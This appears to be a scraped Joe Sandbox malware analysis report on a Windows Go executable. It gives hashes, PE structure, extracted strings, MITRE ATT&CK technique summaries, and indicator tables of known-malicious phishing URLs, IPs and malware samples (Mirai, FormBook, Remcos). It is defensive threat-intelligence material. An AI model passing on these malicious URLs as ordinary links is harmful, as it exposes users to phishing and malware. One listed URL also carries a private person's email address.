String ID: ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St$3$runtime: netpoll: PostQueuedCompletionStatus failed (errno= runtime: GetQueuedCompletionStatusEx returned invalid mode= AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY not found in environmentreflect: call of reflect.Value.Len on ptr to non-array Valuetls: no supported ve$runtime: netpoll: PostQueuedCompletionStatus failedfatal: systemstack called from unexpected goroutinebucket name %s is not compatible with S3 Accelerategodebug: Value of name not listed in godebugs.All: crypto/tls: reserved ExportKeyingMaterial label: %stls:
API String ID: 0-2551176156
Opcode ID: 71ff4ba92b314377a4e0a2363d5e6cdf5ee443cf3ffbad398076d8357eca16b1
Instruction ID: e17d09aab395ff0196daf14d2ef1c8df422536fec44858292fe6a4dd4edac811
Opcode Fuzzy Hash: 71ff4ba92b314377a4e0a2363d5e6cdf5ee443cf3ffbad398076d8357eca16b1
Instruction Fuzzy Hash: 202136B0548701CFD300EF24D09576ABBE4FF84344F80889DE88887352E7789988DB93

Function 00AF61F0 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

runtime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAG, xrefs: 00AF6294
runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAdd, xrefs: 00AF6236
bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: , xrefs: 00AF6260
, xrefs: 00AF629D

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: $ bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: $runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAdd$runtime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAG
API String ID: 0-3511914922
Opcode ID: 3c62cf14b4fb30695661f89d4a846bf822a0303948d875aec1480f9051a52744
Instruction ID: 734a6e67eb43e2358abdeaca2c63a9a62e452b87006151c2b33543765a1b4d59
Opcode Fuzzy Hash: 3c62cf14b4fb30695661f89d4a846bf822a0303948d875aec1480f9051a52744
Instruction Fuzzy Hash: 151193B45497059FD340FFA8C58575EBBE4EF84744F80886CE48883341DB7898889FA3

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://asemailmgmteu.com/api/channels/email/unsubscribe?app_key=UQFtfjD1SJy3G7HKVytUwA&channel_id=hmAq7TweRB-4MzPTFpQTfA&push_id=d85eee10-522d-11ee-99e5-0242ab6c490e&message_type=commercial&campaigns=SME_First_Anniversary_Email_13092023&campaigns=MC&redirect=http://homerunpropertybuyer.com/hhl/ahges/johng@edcodistributing.com	Get hash	malicious	Unknown	Browse	104.17.247.203
	https://asemailmgmteu.com/api/channels/email/unsubscribe?app_key=UQFtfjD1SJy3G7HKVytUwA&channel_id=hmAq7TweRB-4MzPTFpQTfA&push_id=d85eee10-522d-11ee-99e5-0242ab6c490e&message_type=commercial&campaigns=SME_First_Anniversary_Email_13092023&campaigns=MC&redirect=http://homerunpropertybuyer.com/hhl/ahges/johng@edcodistributing.com	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	http://bshwhbaa.blogspot.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://go-event.krafton-redeem.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://attnet-103116.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://home-page---coinbase-learn.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.34.227
HETZNER-ASDE	http://metamasskluginn.blogspot.co.uk/	Get hash	malicious	Unknown	Browse	128.140.120.57
	http://lobster.cloudserver1097.com/lclil9bc3y0frc44	Get hash	malicious	Unknown	Browse	159.69.12.52
	https://daehwa.info/uploaded/file/71677108868.pdf	Get hash	malicious	PDFPhish	Browse	176.9.47.219
	rNuevoPedidoPO-00843.pdf.com.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	file.exe	Get hash	malicious	Vidar	Browse	94.130.188.148
	Sepco RFQ.xls	Get hash	malicious	Remcos	Browse	88.99.66.38
	Thermo Fisher RFQ_TFS-1805.xls	Get hash	malicious	GuLoader	Browse	88.99.66.38
	Swift Payment.xls	Get hash	malicious	FormBook	Browse	88.99.66.38
	Paul Agrotis List.xls	Get hash	malicious	FormBook	Browse	88.99.66.38
	http://control.frilix.com/grace/fxc/aW5mby5jcmVkaXRldXJlbkBicmVkYS5ubA==	Get hash	malicious	HTMLPhisher	Browse	88.99.252.96
PIRANHA-AS-KRPiranhaSystemsKR	file.exe	Get hash	malicious	Unknown	Browse	154.18.200.102
	file.exe	Get hash	malicious	Unknown	Browse	154.18.200.103
	154.216.17.9-skid.m68k-2024-08-04T06_23_08.elf	Get hash	malicious	Mirai, Moobot	Browse	101.250.29.148
	AAMwAy8pB7.elf	Get hash	malicious	Mirai, Moobot	Browse	14.206.54.211
	RDEHNTKF1V.elf	Get hash	malicious	Mirai, Moobot	Browse	182.163.212.248
	ysEZTOz202.elf	Get hash	malicious	Mirai	Browse	112.213.7.31
	dZcVvCQn9I.elf	Get hash	malicious	Mirai	Browse	101.250.29.141
	YnO77q8WhV.elf	Get hash	malicious	Unknown	Browse	154.18.217.41
	xDqMW4J6W3.elf	Get hash	malicious	Unknown	Browse	122.49.121.182
	57O67GbOCj.elf	Get hash	malicious	Mirai	Browse	112.213.7.51

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.26.8.44	http://claimlive0.pages.dev/	Get hash	malicious	Unknown	Browse
	https://maisontrouvaille8.wordpress.com/	Get hash	malicious	Unknown	Browse
	ACH_PaymentConfirmation.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://pariscope.com.au/robots.html?colors=YmxhbmdlQGplZmZwYXJpc2gubmV0	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%253A%252F%252Flaunch%252F%253futm_content%253dUL_hero%2526utm_source%253dsf%2526utm_medium%253dcrm%2526utm_campaign%253dnl%2526utm_term%253dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%2526mktportal%253dNL&af_web_dp=https://scotchroom.com/one/way/%7bRANDOM_NUMBER13%7d/%2F/TWF0dGhld19Tb2xpZGF5QGZkLm9yZw==	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	ShippingDocs, Today 14 August, 20243WYULamBai.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://coinportfolio.cc/2feb3e56b/	Get hash	malicious	HTMLPhisher	Browse
	PIay__Now__Hi Goodmorning!#3033573968.htm	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	redriverbank.netapprove.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://8n4x.neafterm.su/E4JHaB8h/#Dvalerie.bibee@maxwellroofing.com	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
46.4.105.116	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	4Vp6Xc8SFr.exe	Get hash	malicious	Unknown	Browse
154.18.200.103	file.exe	Get hash	malicious	Unknown	Browse

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.4982466198784286
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5EvHHcMjRg.exe
File size:	16'819'200 bytes
MD5:	1c6b522d985b2e60890a098e3d5e78b8
SHA1:	32885914ce6f49f589842b174a0e13d7dc334d5f
SHA256:	35005932465ca51b1bffcd168dd6c9386dbdecb78efacfbe4877b9b1e65da8b4
SHA512:	5c83225a98f810d777986c4d128e597da04137e815fd7ef793ed53294ab7fdb2fd05cc1df3a9de3b7c53955cdb2890fa5d508d1011ccf4ef2f92ccbb9d29a608
SSDEEP:	98304:D5MCdYwJ/6LV6oJBgsJDVUN81bIe3Ev9kaxS0i8J2LAAvbW54jSEUb5HwXQiUacn:uqm6ABmN81bH0VSpO2sGb905QX5ccC
TLSH:	4C076C61FA8740F6D943157580AB636F67385D018B3ACB9BEB10BE69FC376921C3B205
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............(............D..,...............p....@.......................................@................................

Entrypoint:	0x46dc80
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	4f2f006e2ecf7172ad368f8289dc96c1

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf67000	0x45e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x102e000	0x32810	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf68000	0x37a98	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc17300	0xb8	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x440fb5	0x441000	4f1d2771b9fb74fe172ec3f248a2466d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x442000	0x7d4bf8	0x7d4c00	28cbf1c3ccfb93d602c3ee71808a1d70	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc17000	0x9052c	0x40200	95e47e6802264374c9b15c62c85eff10	False	0.42500456871345027	data	5.392436340774205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
/4	0xca8000	0x129	0x200	17f62672c8506464ae13eccc2eb6cb94	False	0.623046875	data	5.081946473254993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0xca9000	0x93c6b	0x93e00	9cf0b78062bf102c9e768a07c0588c04	False	0.9995047020287405	data	7.996989836246314	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32	0xd3d000	0x1aac2	0x1ac00	02535763e104aa7df05ffb7e0b05b18b	False	0.997700058411215	data	7.980773060165256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46	0xd58000	0x30	0x200	40cca7c46fc713b4f088e5d440ca7931	False	0.103515625	data	0.8556848540171443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65	0xd59000	0x118ac2	0x118c00	b9db244c71f0109656f65402bd9d3d81	False	0.9991938793967052	data	7.997868711807079	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/78	0xe72000	0xbecaa	0xbee00	55a4999e466bb03861b1ef2c0e94c647	False	0.9704012667812705	data	7.995194165369883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90	0xf31000	0x35ab3	0x35c00	144114284783f93f1eab639d7a59eeab	False	0.9928733648255814	data	7.938512432689286	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0xf67000	0x45e	0x600	7c1a3d1f95898ea3664a1e7cc18742aa	False	0.359375	data	3.8463355350158914	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xf68000	0x37a98	0x37c00	947a8cdfa7fcc2a3382843bf44df1930	False	0.6041593679932735	data	6.71424040962435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xfa0000	0x8d1b1	0x8d200	02eff2c5f50bf4c6ce20ee15b2610cdc	False	0.2027478686891054	data	5.380951329616342	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x102e000	0x32810	0x32a00	703ce7aafd798ae922c1e654593030f9	False	0.5041136188271605	data	6.521880264976137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x102e250	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.7987588652482269
RT_ICON	0x102e6b8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.6221311475409836
RT_ICON	0x102f040	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.21931407942238268
RT_ICON	0x102f8e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.4059128630705394
RT_ICON	0x1031e90	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.3863367973547473
RT_ICON	0x10360b8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	0.41367837338262475
RT_ICON	0x103b540	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	0.3618614673113307
RT_ICON	0x10449e8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.33448184076659176
RT_ICON	0x1055210	0xb57b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9970726877461848
RT_GROUP_ICON	0x106078c	0x84	data	0.75

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5EvHHcMjRg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

